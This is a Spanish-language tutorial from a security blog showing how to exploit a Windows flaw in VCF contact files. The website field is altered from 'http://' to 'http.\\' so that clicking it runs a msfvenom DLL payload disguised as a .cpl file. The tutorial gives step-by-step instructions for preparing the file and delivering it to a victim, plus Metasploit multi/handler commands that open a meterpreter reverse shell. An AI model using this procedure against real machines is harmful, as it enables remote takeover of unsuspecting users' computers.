https://esgeeks.com/?p=5349
Explotación Windows usando archivo de contacto VCF (Sitio Web)
5 (100%) 11 voto[s]

Un enorme aplauso al investigador de seguridad cibernética John Page de traer esta vulnerabilidad al exploit-db el 15 de enero de 2019. Este fue un 0 day exploit y, por supuesto, funciona con el último Windows 10. Se clasifica en la vulnerabilidad “Ejecución de código remoto de advertencia de IU insuficiente“.

Tipo Vulnerabilidad:

Website: Insufficient UI Warning Arbitrary Code Execution
99%

Nota 1!

El autor no se responsabiliza del mal uso que se haga de la información aquí contenida ni por cualquier daño causado por el uso o mal uso de esta información.


1. Introducción a la ejecución remota de código

Básicamente, lo que John descubrió fue que si reemplazamos el sitio web en un archivo VCF con la ruta local de un archivo CPL, tiende a instalar ese archivo en lugar de abrirlo en el navegador.

Esto se hace reemplazando el “http://” por “http.\\“, que es totalmente insano, ya que un usuario necesitaría los ojos de varios mega píxeles para descubrir un error de ruta intencional de ese tipo. Entonces, todo lo que tenemos que hacer es enviar a la víctima el archivo VCF junto con nuestro archivo CPL en una carpeta llamada “http” (tiene que ser http solo para la inclusión de la ruta local) y obtendremos un shell.

Para leer más sobre la investigación sigue este enlace.

Metodología:

  • Crear una carga útil de Windows msfvenom con extensión .dll.
  • Enviar el archivo dll en una carpeta llamada “http“.
  • Crear un archivo de contacto en la carpeta superior de “http“.
  • Agreagar un sitio web en el contacto.
  • Cambiar el prefijo del sitio web de http:// por http.\\
  • Renombrar el archivo dll a “<nombre_sitio_web>.cpl
  • Ejecutar multi handler en Windows.
  • Abrir la ruta del sitio web desde el archivo contacto.
  • Iniciar una sesión de shell.

2. Prueba de concepto

El primer paso sería hacer una carga útil con una extensión dll. Para este propósito, estamos utilizando la carga útil de Windows de msfvenom, pero cualquier otra carga útil debería funcionar bien.

En este caso, mi dirección IP local es 192.168.1.61.

Carga útil de msfvenom para Windows

Carga útil de msfvenom para Windows

A continuación, transferimos esta carga útil a la máquina víctima en una nueva carpeta llamada http. Esto tiene que ser http y nada más, ya que incluiremos una ruta más adelante en el enlace del sitio web. Y tiene que estar en el directorio actual también. Así que copiamos este archivo shell.dll en la máquina víctima.

Inyección dll en Windows

Inyección dll en Windows

El siguiente y el paso más importante es hacer un archivo VCF de contacto. También puede descargar un vcf de muestra y agregar un sitio web, pero crearéun nuevo archivo de contacto. El sistema que usaré es Windows 10, por lo que la versión del archivo VCF puede diferir de la suya, pero igual funcionaría.


Agregue cualquier nombre en el archivo de contacto. (Agregué a Alexis Junior)

Información de contacto en VCF

Información de contacto en VCF

Pasa a la siguiente pestaña de Domicilio y verás un cuadro de texto para ingresar un sitio web. Agrega el nombre de cualquier sitio web como desees. Agregué el nombre de mi sitio web “esgeeks.com”, pero aquí viene lo más importante que debes tener en cuenta:

El enlace de un sitio web genérico es https://www.esgeeks.com pero modificamos un poco el prefijo reemplazando http:// por http.\\

Esto se debe a que en realidad no queremos incluir un sitio web, sino queremos incluir una ruta de acceso a nuestro archivo DLL para que cuando la víctima haga clic en el sitio web, nuestra DLL se ejecute.

A continuación, estaré fijando el enlace al sitio web con la extensión “.cpl“. Un archivo CPL es un elemento del panel de control, como Pantalla, Ratón, Sonido o Redes, utilizado por el sistema operativo Windows. (Tengo algo para ti: 200 Comandos para Ejecutar en Windows [Panel de Control])

Contacto con información de sitio web

Contacto con información de sitio web

Guardar el contacto. Ahora cambia el nombre de la carga de shell.dll a “www.esgeeks.com.cpl

Ahora estamos preparados y listos para ejecutar el archivo DLL, de modo que configuramos el multi/handler en una ventana de terminal y abrimos el contacto en la máquina de la víctima.

Ejecutar el archivo DLL remoto

Ejecutar el archivo DLL remoto

Tan pronto como hagamos clic en el enlace del sitio web, veremos que se obtiene una sesión en el terminal Kali Linux.

msfconsole
use exploit/multi/handler
set lhost 192.168.1.61
set lport 1234
set payload windows/meterpreter/reverse_tcp
exploit
Sesión meterpreter para hacking Windows

Sesión meterpreter para hacking Windows

Esto genera un shell del usuario actual de Windows que ha iniciado sesión.

3. Conclusión

Esta es una sorprendente vulnerabilidad descubierta por John Page y afecta a todas las versiones de trabajo de Windows que admiten archivos VCF de contacto. Como puedes ver, hemos generado un shell de Windows 10, es seguro decir que las versiones inferiores también se ven afectadas. ¡No olvides compartirlo en tus redes sociales! :’)


¡Mantente actualizado!

Suscríbete a nuestro boletín semanal...

Suscríbete a nuestro boletín electrónico para recibir artículos útiles y ofertas especiales. No te perderás absolutamente de nada!

Enviaremos solamente boletines al email y no compartiremos tu email.